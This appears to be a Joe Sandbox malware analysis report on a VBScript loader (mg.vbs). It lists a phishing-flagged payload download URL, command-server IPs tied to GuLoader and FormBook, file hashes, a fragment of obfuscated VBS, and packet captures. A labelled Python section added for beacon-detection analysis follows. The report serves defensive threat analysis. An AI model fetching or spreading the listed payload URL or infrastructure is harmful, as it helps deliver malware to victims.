      http://www.erp-royal-crown.info | powershell.exe, 00000001.00000002.2980240959.00000273BC5FC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2980240959.00000273BC1CC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2980240959.00000273BB7A7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2980240959.00000273BB4CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2980240959.00000273BBE05000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2980240959.00000273BB1F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2980240959.00000273BBFB6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2980240959.00000273BBC59000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2980240959.00000273BC441000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: phishing | unknown
      http://pesterbdd.com/images/Pester.png | powershell.exe, 00000001.00000002.2980240959.00000273BAEA8000.00000004.00000800.00020000.00000000.sdmp | false | - | high
      http://erp-royal-crown.info | powershell.exe, 00000001.00000002.2980240959.00000273BC5FC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2980240959.00000273BC1CC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2980240959.00000273BB7A7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2980240959.00000273BB4CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2980240959.00000273BBE05000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2980240959.00000273BB1F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2980240959.00000273BBFB6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2980240959.00000273BBC59000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2980240959.00000273BC441000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: phishing | unknown
      http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000001.00000002.2980240959.00000273BAEA8000.00000004.00000800.00020000.00000000.sdmp | false | - | high
      https://www.erp-royal-crown.info | powershell.exe, 00000001.00000002.2980240959.00000273BC1CC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2980240959.00000273BB7A7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2980240959.00000273BC5EC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2980240959.00000273BBE05000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2980240959.00000273BB1F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2980240959.00000273BBFB6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2980240959.00000273BBC59000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2980240959.00000273BC441000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: phishing | unknown
      https://contoso.com/ | powershell.exe, 00000001.00000002.3000440542.00000273CACEF000.00000004.00000800.00020000.00000000.sdmp | false | - | high
      https://nuget.org/nuget.exe | powershell.exe, 00000001.00000002.3000440542.00000273CAE31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.3000440542.00000273CACEF000.00000004.00000800.00020000.00000000.sdmp | false | - | high
      https://contoso.com/License | powershell.exe, 00000001.00000002.3000440542.00000273CACEF000.00000004.00000800.00020000.00000000.sdmp | false | - | high
      https://contoso.com/Icon | powershell.exe, 00000001.00000002.3000440542.00000273CACEF000.00000004.00000800.00020000.00000000.sdmp | false | - | high
      https://www.almrwad.com | powershell.exe, 00000001.00000002.2980240959.00000273BB1F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2980240959.00000273BC06D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2980240959.00000273BC6BA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2980240959.00000273BBD10000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2980240959.00000273BAEA8000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
      https://aka.ms/pscore68 | powershell.exe, 00000001.00000002.2980240959.00000273BAC81000.00000004.00000800.00020000.00000000.sdmp | false | - | high
      https://www.erp-royal-crown.info/wh/Subordinerendes78.smiX | powershell.exe, 00000001.00000002.2980240959.00000273BAEA8000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: phishing | unknown
      http://www.almrwad.com | powershell.exe, 00000001.00000002.2980240959.00000273BC4A8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2980240959.00000273BC3D3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2980240959.00000273BC668000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2980240959.00000273BB7A7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2980240959.00000273BBE9D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2980240959.00000273BCAA7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2980240959.00000273BB5AB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2980240959.00000273BB1F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2980240959.00000273BC06D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2980240959.00000273BBD2B000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000001.00000002.2980240959.00000273BAC81000.00000004.00000800.00020000.00000000.sdmp | false | - | high
      https://github.com/Pester/Pester | powershell.exe, 00000001.00000002.2980240959.00000273BAEA8000.00000004.00000800.00020000.00000000.sdmp | false | - | high
      IP | Domain | Country | ASN | ASN Name | Malicious
      148.251.114.233 | erp-royal-crown.info | Germany | 24940 | HETZNER-ASDE | false
      184.171.244.231 | almrwad.com | United States | 33182 | DIMENOCUS | false
      Joe Sandbox version: 41.0.0 Charoite
      Analysis ID: 1569002
      Start date and time: 2024-12-05 10:40:48 +01:00
      Joe Sandbox product: CloudBasic
      Overall analysis duration: 0h 4m 47s
      Hypervisor based Inspection enabled: false
      Report type: full
      Cookbook file name: default.jbs
      Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
      Number of analysed new started processes analysed: 8
      Number of new started drivers analysed: 0
      Number of existing processes analysed: 0
      Number of existing drivers analysed: 0
      Number of injected processes analysed: 0
      Technologies:
      • HCA enabled
      • EGA enabled
      • AMSI enabled
      Analysis Mode: default
      Analysis stop reason: Timeout
      Sample name: mg.vbs
      Detection: MAL
      Classification: mal100.expl.evad.winVBS@6/3@2/2
      EGA Information: Failed
      HCA Information:
      • Successful, ratio: 100%
      • Number of executed functions: 4
      • Number of non-executed functions: 1
      Cookbook Comments:
      • Found application associated with file extension: .vbs
      • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
      • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
      • Execution Graph export aborted for target powershell.exe, PID 7016 because it is empty
      • Not all processes were analyzed, report is missing behavior information
      • Report size getting too big, too many NtOpenKeyEx calls found.
      • Report size getting too big, too many NtProtectVirtualMemory calls found.
      • Report size getting too big, too many NtQueryValueKey calls found.
      • VT rate limit hit for: mg.vbs
      Time | Type | Description
      04:41:43 | API Interceptor | 3727444x Sleep call for process: powershell.exe modified
      Match | Associated Sample Name / URL | Detection | Threat Name | Context
      148.251.114.233 | PURCHASE ORDER-6350.exe | malicious | FormBook | www.eslameldaramlly.site/30vc/
      148.251.114.233 | PURCHASE ORDER-6350.exe | malicious | FormBook | www.eslameldaramlly.site/30vc/
      148.251.114.233 | PO5118000306 pdf.exe | malicious | FormBook | www.eslameldaramlly.site/fchs/
      148.251.114.233 | PO23100072.exe | malicious | FormBook | www.eslameldaramlly.site/30vc/
      148.251.114.233 | PO-000001488.exe | malicious | FormBook | www.eslameldaramlly.site/30vc/
      148.251.114.233 | PURCHASE ORDER-6350.exe | malicious | FormBook | www.eslameldaramlly.site/30vc/
      184.171.244.231 | mj.ps1 | malicious | Unknown | -
      184.171.244.231 | ap.ps1 | malicious | Unknown | -
      184.171.244.231 | cu.ps1 | malicious | Unknown | -
      184.171.244.231 | Scripts_Obfusque.vbs | malicious | Unknown | -
      184.171.244.231 | ni.ps1 | malicious | Unknown | -
      184.171.244.231 | qc.ps1 | malicious | GuLoader, RHADAMANTHYS | -
      184.171.244.231 | yd2.vbs | malicious | GuLoader, RHADAMANTHYS | -
      184.171.244.231 | List of Required items and services.zip | malicious | GuLoader, RHADAMANTHYS | -
      Match | Associated Sample Name / URL | Detection | Threat Name | Context
      DIMENOCUS | mj.ps1 | malicious | Unknown | 184.171.244.231
      DIMENOCUS | ap.ps1 | malicious | Unknown | 184.171.244.231
      DIMENOCUS | cu.ps1 | malicious | Unknown | 184.171.244.231
      DIMENOCUS | Scripts_Obfusque.vbs | malicious | Unknown | 184.171.244.231
      DIMENOCUS | ni.ps1 | malicious | Unknown | 184.171.244.231
      DIMENOCUS | file.exe | malicious | Amadey, LummaC Stealer, Nymaim, RHADAMANTHYS, Stealc, Vidar | 67.23.237.28
      DIMENOCUS | file.exe | malicious | Amadey | 67.23.237.28
      DIMENOCUS | mipsel.nn.elf | malicious | Mirai, Okiru | 8.33.162.220
      DIMENOCUS | Annual_Q4_Benefits_&_Bonus_for_Ed.riley#IyNURVhUTlVNUkFORE9NNDUjIw==.docx | malicious | HTMLPhisher | 177.234.150.226
      DIMENOCUS | 3e5cb809-f546-fb3c-b0e3-5de228b453ab.eml | malicious | HTMLPhisher | 177.234.150.226
      HETZNER-ASDE | mj.ps1 | malicious | Unknown | 148.251.114.233
      HETZNER-ASDE | ap.ps1 | malicious | Unknown | 148.251.114.233
      HETZNER-ASDE | cu.ps1 | malicious | Unknown | 148.251.114.233
      HETZNER-ASDE | Scripts_Obfusque.vbs | malicious | Unknown | 148.251.114.233
      HETZNER-ASDE | ni.ps1 | malicious | Unknown | 148.251.114.233
      HETZNER-ASDE | UPDATED CONTRACT.exe | malicious | FormBook | 88.99.61.52
      HETZNER-ASDE | https://clickme.thryv.com/ls/click?upn=u001.5dsdCa4YiGVzoib36gWoSLMas8wKe7Ih4zqBiyHkarn0j5lOr9uX2Ipi5t6mu5SV-2B1JsyP5-2FhfNtTtQOlKj0flyS3vwLeKaJ6ckzVjuZims-3DLeyB_UNbDpVWBvKTmUslwem1E0EC2Cp68hMzvjQfllUT9E4DZqDf2uiRmAk3QSMceJiv-2FShXGXSXiT9Fl37dFQYscKLxEMcTJj4tm5gMav6Ov9aTBg62vcUAgkYbCAf46MpAyc7W7GFqvL6adNxNCTlmXTIiiRHR0fGeBxBsxNA5VbYoJQJb-2FJYi0QkLgjAoVYrRvTi1dn7pPo7PbeQWMcs70s7UFE7WeCgk9rDpKP4binyuu0CEbckceaS6ycGVUXPi2325g7v8hitus3ay9MICEoPWHxYePXARIxPiq-2FS9xmhqxVG-2BsRc9-2BU2VqX-2BZB9nYYuSKeNDIvkVaXKl7x-2FFSxF7xXa4BaT30eg9SUGZbRvZ8-3D#C | malicious | Captcha Phish, HTMLPhisher | 5.9.227.67
      HETZNER-ASDE | Ttok18.exe | malicious | Vidar | 159.69.102.165
      HETZNER-ASDE | jtkhikadjthsad.exe | malicious | Vidar | 159.69.102.165
      HETZNER-ASDE | file.exe | malicious | Vidar | 159.69.102.165
      Match | Associated Sample Name / URL | Detection | Threat Name | Context
      3b5074b1b5d032e5620f69f9f700ff0e | mj.ps1 | malicious | Unknown | 148.251.114.233, 184.171.244.231
      3b5074b1b5d032e5620f69f9f700ff0e | ap.ps1 | malicious | Unknown | 148.251.114.233, 184.171.244.231
      3b5074b1b5d032e5620f69f9f700ff0e | cu.ps1 | malicious | Unknown | 148.251.114.233, 184.171.244.231
      3b5074b1b5d032e5620f69f9f700ff0e | Scripts_Obfusque.vbs | malicious | Unknown | 148.251.114.233, 184.171.244.231
      3b5074b1b5d032e5620f69f9f700ff0e | ni.ps1 | malicious | Unknown | 148.251.114.233, 184.171.244.231
      3b5074b1b5d032e5620f69f9f700ff0e | REQUEST FOR QUOATION AND PRICES 0106-24_pdf.exe | malicious | GuLoader, MassLogger RAT | 148.251.114.233, 184.171.244.231
      3b5074b1b5d032e5620f69f9f700ff0e | RFQ.exe | malicious | AgentTesla, PureLog Stealer | 148.251.114.233, 184.171.244.231
      3b5074b1b5d032e5620f69f9f700ff0e | 31#U544a.exe | malicious | CobaltStrike | 148.251.114.233, 184.171.244.231
      3b5074b1b5d032e5620f69f9f700ff0e | R7bv9d6gTH.dll | malicious | Unknown | 148.251.114.233, 184.171.244.231
      3b5074b1b5d032e5620f69f9f700ff0e | Patch.exe | malicious | PureLog Stealer, XWorm |
                                                  • 148.251.114.233
                                                  • 184.171.244.231
                                                  No context
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:data
                                                  Category:modified
                                                  Size (bytes):11608
                                                  Entropy (8bit):4.890472898059848
                                                  Encrypted:false
                                                  SSDEEP:192:6xoe5qpOZxoe54ib4ZVsm5emdqVFn3eGOVpN6K3bkkjo5OgkjDt4iWN3yBGHVQ9R:9rib4ZmVoGIpN6KQkj2Fkjh4iUxsT6YP
                                                  MD5:8A4B02D8A977CB929C05D4BC2942C5A9
                                                  SHA1:F9A6426CAF2E8C64202E86B07F1A461056626BEA
                                                  SHA-256:624047EB773F90D76C34B708F48EA8F82CB0EC0FCF493CA2FA704FCDA7C4B715
                                                  SHA-512:38697525814CDED7B27D43A7B37198518E295F992ECB255394364EC02706443FB3298CBBAA57629CCF8DDBD26FD7CAAC44524C4411829147C339DD3901281AC2
                                                  Malicious:false
                                                  Reputation:moderate, very likely benign file
                                                  Preview:PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Reputation:high, very likely benign file
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                  File type:ASCII text, with very long lines (316), with CRLF line terminators
                                                  Entropy (8bit):5.16757071229696
                                                  TrID:
                                                  • Visual Basic Script (13500/0) 100.00%
                                                  File name:mg.vbs
                                                  File size:29'287 bytes
                                                  MD5:8df76af54c38d5d4c2cd9f6d18eedf92
                                                  SHA1:b21c95ebf34440ad8da30f6e4fe25badb871d61a
                                                  SHA256:2fd9440e21adf91473719e9fb085f4d47a1d5afcf02333a7f04d2a0f4d0b1c77
                                                  SHA512:8dbbdbc575a292890f1b1bb8aeda916a958225b11739075b447ae7ce64774c678c45b071f0fbb91460bb218409e026ecfcf05740dad8eb059b773c990d57fb09
                                                  SSDEEP:768:5Yf48SKT1nPeL9GLfqAQnS71KcNrx182u+:504lKT1P0yfqAuiNbtu+
                                                  TLSH:D9D219D3CAC625188A9509B7DD130BB34DA1456E77131F38A3BCCA5D908395CA2BFBC8
                                                  File Content Preview:......Function Seasoning(Ambrain)......Publikummetbatfowl = Mid(MidB(Command, 44, 213),21,25)....Seasoning = ChrW(Ambrain)....Opskreknivsplid = Command ......End Function ....elektroingenirerne = LenB("Sardinieren") ..elektroingenirerne = elektroingenirer
                                                  Icon Hash:68d69b8f86ab9a86
| Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol |
|---|---|---|---|---|---|---|---|---|
| 2024-12-05T10:41:52.827105+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.4 | 49731 | 184.171.244.231 | 443 | TCP |
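The TCP table that follows is the raw evidence behind the single IDS alert above: a fresh TLS connection from the analysis VM roughly every six seconds, alternating between 184.171.244.231 and 148.251.114.233. When the report's HTML is scraped, each row of that table arrives with its cells run together, e.g. `Dec 5, 2024 10:41:44.977871895 CET49730443192.168.2.4184.171.244.231`, which is ambiguous to split naively (`49730|443` versus `497|30443`, `192.168.2.4|184...` versus `192.168.2.41|84...`). The following Python is an added example, not part of the Joe Sandbox report: it recovers the five columns by enumerating every legal split and keeping the one that names the sandbox host, then groups packets into connections by the VM's client port and reports the inter-connection cadence. It assumes the sandbox host is 192.168.2.4 (as the rows state) and that the VM's client ports fall in the Windows dynamic range starting at 49152; that second assumption is only used as a tie-breaker. The sample rows are copied from the table below.

```python
"""Recover the columns of a Joe Sandbox TCP packet table and measure beacon cadence.

When the report's HTML is scraped, each row arrives as
"<timestamp> CET<src port><dst port><src ip><dst ip>" with no separators, so the
ports and addresses are recovered by enumerating every split and keeping the one
that names the sandbox host.  Assumptions (not rules stated by the report):
the sandbox host is 192.168.2.4, and its client ports lie in the Windows dynamic
range (49152-65535), which is used only to break ties between valid splits.
"""
import re
import statistics
from datetime import datetime

LOCAL_IP = "192.168.2.4"   # the analysis VM's address as it appears in the table
EPHEMERAL_MIN = 49152      # assumed Windows dynamic port range start (tie-breaker only)

# Rows copied verbatim from the report's TCP table (not constructed data).
SAMPLE_ROWS = """\
Dec 5, 2024 10:41:44.977871895 CET49730443192.168.2.4184.171.244.231
Dec 5, 2024 10:41:44.977926970 CET44349730184.171.244.231192.168.2.4
Dec 5, 2024 10:41:46.909812927 CET49730443192.168.2.4184.171.244.231
Dec 5, 2024 10:41:51.097549915 CET49731443192.168.2.4184.171.244.231
Dec 5, 2024 10:41:52.829233885 CET49731443192.168.2.4184.171.244.231
Dec 5, 2024 10:41:56.992300987 CET49732443192.168.2.4148.251.114.233
Dec 5, 2024 10:41:58.398422003 CET44349732148.251.114.233192.168.2.4
Dec 5, 2024 10:42:02.973949909 CET49737443192.168.2.4184.171.244.231
Dec 5, 2024 10:42:08.692470074 CET49740443192.168.2.4148.251.114.233
Dec 5, 2024 10:42:14.648020029 CET49741443192.168.2.4184.171.244.231
Dec 5, 2024 10:42:20.380245924 CET49742443192.168.2.4148.251.114.233
""".splitlines()

ROW_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2} \d{1,2}, \d{4} \d{2}:\d{2}:\d{2})\.(?P<frac>\d+) "
    r"[A-Z]{3,4}(?P<rest>[\d.]+)$"
)


def valid_port(s):
    """1-65535, decimal, no leading zero (so '0443' is rejected)."""
    return s.isdigit() and (len(s) == 1 or s[0] != "0") and 1 <= int(s) <= 65535


def valid_ip(s):
    """Dotted quad with octets 0-255 and no leading zeros."""
    parts = s.split(".")
    return len(parts) == 4 and all(
        p.isdigit() and (p == "0" or p[0] != "0") and int(p) <= 255 for p in parts
    )


def two_way_splits(s, ok):
    """All ways to cut s into two pieces that both satisfy ok()."""
    return [(s[:i], s[i:]) for i in range(1, len(s)) if ok(s[:i]) and ok(s[i:])]


def parse_row(line, local_ip=LOCAL_IP):
    """Return (seconds since epoch, src port, dst port, src ip, dst ip) for one row."""
    m = ROW_RE.match(line.strip())
    if not m:
        raise ValueError("not a packet row: %r" % line)
    base = datetime.strptime(m["ts"], "%b %d, %Y %H:%M:%S")
    ts = (base - datetime(1970, 1, 1)).total_seconds() + float("0." + m["frac"])
    rest = m["rest"]
    first_dot = rest.index(".")
    candidates = []
    for octet_len in (1, 2, 3):           # first octet of the source IP is 1-3 digits
        cut = first_dot - octet_len       # everything before it is the two ports
        if cut < 2:
            continue
        for sp, dp in two_way_splits(rest[:cut], valid_port):
            for sip, dip in two_way_splits(rest[cut:], valid_ip):
                if (sip == local_ip) != (dip == local_ip):   # exactly one end is the VM
                    candidates.append((int(sp), int(dp), sip, dip))
    if len(candidates) > 1:   # e.g. 49730|443 vs 497|30443: keep the ephemeral local port
        candidates = [c for c in candidates
                      if (c[0] if c[2] == local_ip else c[1]) >= EPHEMERAL_MIN]
    if len(candidates) != 1:
        raise ValueError("ambiguous row %r: %r" % (line, candidates))
    return (ts,) + candidates[0]


def flows(rows, local_ip=LOCAL_IP):
    """One entry per TCP connection, keyed by the VM's client port: (first seen, remote ip)."""
    first_seen = {}
    for ts, sp, dp, sip, dip in (parse_row(r, local_ip) for r in rows):
        local_port, remote = (sp, dip) if sip == local_ip else (dp, sip)
        if local_port not in first_seen or ts < first_seen[local_port][0]:
            first_seen[local_port] = (ts, remote)
    return sorted(first_seen.values())


def beacon_summary(rows, local_ip=LOCAL_IP):
    """Gaps between connection starts: a tight median with low jitter is the beacon signature."""
    fl = flows(rows, local_ip)
    gaps = [b[0] - a[0] for a, b in zip(fl, fl[1:])]
    return {
        "connections": len(fl),
        "remotes": [remote for _, remote in fl],
        "median_gap_s": statistics.median(gaps) if gaps else None,
        "jitter_s": max(gaps) - min(gaps) if gaps else None,
    }


if __name__ == "__main__":
    print(beacon_summary(SAMPLE_ROWS))
```

On the sample rows this yields seven connections, a median gap of about 5.9 s with under half a second of jitter, and a remote-host sequence that alternates between the two addresses after the first two contacts. That regularity, not the destination addresses, is the portable detection: the addresses rotate per campaign, while a scripted loader that polls on a fixed timer tends to keep its cadence.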
| Timestamp | Source Port | Dest Port | Source IP | Dest IP |
|---|---|---|---|---|
| Dec 5, 2024 10:41:44.977871895 CET | 49730 | 443 | 192.168.2.4 | 184.171.244.231 |
| Dec 5, 2024 10:41:44.977926970 CET | 443 | 49730 | 184.171.244.231 | 192.168.2.4 |
| Dec 5, 2024 10:41:44.978003025 CET | 49730 | 443 | 192.168.2.4 | 184.171.244.231 |
| Dec 5, 2024 10:41:44.985450983 CET | 49730 | 443 | 192.168.2.4 | 184.171.244.231 |
| Dec 5, 2024 10:41:44.985493898 CET | 443 | 49730 | 184.171.244.231 | 192.168.2.4 |
| Dec 5, 2024 10:41:46.447745085 CET | 443 | 49730 | 184.171.244.231 | 192.168.2.4 |
| Dec 5, 2024 10:41:46.447879076 CET | 49730 | 443 | 192.168.2.4 | 184.171.244.231 |
| Dec 5, 2024 10:41:46.471873999 CET | 49730 | 443 | 192.168.2.4 | 184.171.244.231 |
| Dec 5, 2024 10:41:46.471916914 CET | 443 | 49730 | 184.171.244.231 | 192.168.2.4 |
| Dec 5, 2024 10:41:46.472311020 CET | 443 | 49730 | 184.171.244.231 | 192.168.2.4 |
| Dec 5, 2024 10:41:46.517453909 CET | 49730 | 443 | 192.168.2.4 | 184.171.244.231 |
| Dec 5, 2024 10:41:46.554768085 CET | 49730 | 443 | 192.168.2.4 | 184.171.244.231 |
| Dec 5, 2024 10:41:46.595338106 CET | 443 | 49730 | 184.171.244.231 | 192.168.2.4 |
| Dec 5, 2024 10:41:46.899909019 CET | 443 | 49730 | 184.171.244.231 | 192.168.2.4 |
| Dec 5, 2024 10:41:46.899982929 CET | 443 | 49730 | 184.171.244.231 | 192.168.2.4 |
| Dec 5, 2024 10:41:46.900057077 CET | 49730 | 443 | 192.168.2.4 | 184.171.244.231 |
| Dec 5, 2024 10:41:46.909812927 CET | 49730 | 443 | 192.168.2.4 | 184.171.244.231 |
| Dec 5, 2024 10:41:51.097549915 CET | 49731 | 443 | 192.168.2.4 | 184.171.244.231 |
| Dec 5, 2024 10:41:51.097599983 CET | 443 | 49731 | 184.171.244.231 | 192.168.2.4 |
| Dec 5, 2024 10:41:51.098066092 CET | 49731 | 443 | 192.168.2.4 | 184.171.244.231 |
| Dec 5, 2024 10:41:51.098066092 CET | 49731 | 443 | 192.168.2.4 | 184.171.244.231 |
| Dec 5, 2024 10:41:51.098114967 CET | 443 | 49731 | 184.171.244.231 | 192.168.2.4 |
| Dec 5, 2024 10:41:52.366038084 CET | 443 | 49731 | 184.171.244.231 | 192.168.2.4 |
| Dec 5, 2024 10:41:52.372734070 CET | 49731 | 443 | 192.168.2.4 | 184.171.244.231 |
| Dec 5, 2024 10:41:52.372761011 CET | 443 | 49731 | 184.171.244.231 | 192.168.2.4 |
| Dec 5, 2024 10:41:52.827157974 CET | 443 | 49731 | 184.171.244.231 | 192.168.2.4 |
| Dec 5, 2024 10:41:52.827238083 CET | 443 | 49731 | 184.171.244.231 | 192.168.2.4 |
| Dec 5, 2024 10:41:52.827594995 CET | 49731 | 443 | 192.168.2.4 | 184.171.244.231 |
| Dec 5, 2024 10:41:52.829233885 CET | 49731 | 443 | 192.168.2.4 | 184.171.244.231 |
| Dec 5, 2024 10:41:56.992300987 CET | 49732 | 443 | 192.168.2.4 | 148.251.114.233 |
| Dec 5, 2024 10:41:56.992347002 CET | 443 | 49732 | 148.251.114.233 | 192.168.2.4 |
| Dec 5, 2024 10:41:56.992420912 CET | 49732 | 443 | 192.168.2.4 | 148.251.114.233 |
| Dec 5, 2024 10:41:56.992708921 CET | 49732 | 443 | 192.168.2.4 | 148.251.114.233 |
| Dec 5, 2024 10:41:56.992722988 CET | 443 | 49732 | 148.251.114.233 | 192.168.2.4 |
| Dec 5, 2024 10:41:58.398422003 CET | 443 | 49732 | 148.251.114.233 | 192.168.2.4 |
| Dec 5, 2024 10:41:58.398533106 CET | 49732 | 443 | 192.168.2.4 | 148.251.114.233 |
| Dec 5, 2024 10:41:58.403318882 CET | 49732 | 443 | 192.168.2.4 | 148.251.114.233 |
| Dec 5, 2024 10:41:58.403347015 CET | 443 | 49732 | 148.251.114.233 | 192.168.2.4 |
| Dec 5, 2024 10:41:58.403856993 CET | 443 | 49732 | 148.251.114.233 | 192.168.2.4 |
| Dec 5, 2024 10:41:58.404722929 CET | 49732 | 443 | 192.168.2.4 | 148.251.114.233 |
| Dec 5, 2024 10:41:58.451330900 CET | 443 | 49732 | 148.251.114.233 | 192.168.2.4 |
| Dec 5, 2024 10:41:58.938786983 CET | 443 | 49732 | 148.251.114.233 | 192.168.2.4 |
| Dec 5, 2024 10:41:58.938999891 CET | 443 | 49732 | 148.251.114.233 | 192.168.2.4 |
| Dec 5, 2024 10:41:58.939099073 CET | 49732 | 443 | 192.168.2.4 | 148.251.114.233 |
| Dec 5, 2024 10:41:58.942013025 CET | 49732 | 443 | 192.168.2.4 | 148.251.114.233 |
| Dec 5, 2024 10:42:02.973949909 CET | 49737 | 443 | 192.168.2.4 | 184.171.244.231 |
| Dec 5, 2024 10:42:02.973998070 CET | 443 | 49737 | 184.171.244.231 | 192.168.2.4 |
| Dec 5, 2024 10:42:02.974066019 CET | 49737 | 443 | 192.168.2.4 | 184.171.244.231 |
| Dec 5, 2024 10:42:02.974354029 CET | 49737 | 443 | 192.168.2.4 | 184.171.244.231 |
| Dec 5, 2024 10:42:02.974365950 CET | 443 | 49737 | 184.171.244.231 | 192.168.2.4 |
| Dec 5, 2024 10:42:04.232676983 CET | 443 | 49737 | 184.171.244.231 | 192.168.2.4 |
| Dec 5, 2024 10:42:04.240756989 CET | 49737 | 443 | 192.168.2.4 | 184.171.244.231 |
| Dec 5, 2024 10:42:04.240775108 CET | 443 | 49737 | 184.171.244.231 | 192.168.2.4 |
| Dec 5, 2024 10:42:04.694104910 CET | 443 | 49737 | 184.171.244.231 | 192.168.2.4 |
| Dec 5, 2024 10:42:04.694173098 CET | 443 | 49737 | 184.171.244.231 | 192.168.2.4 |
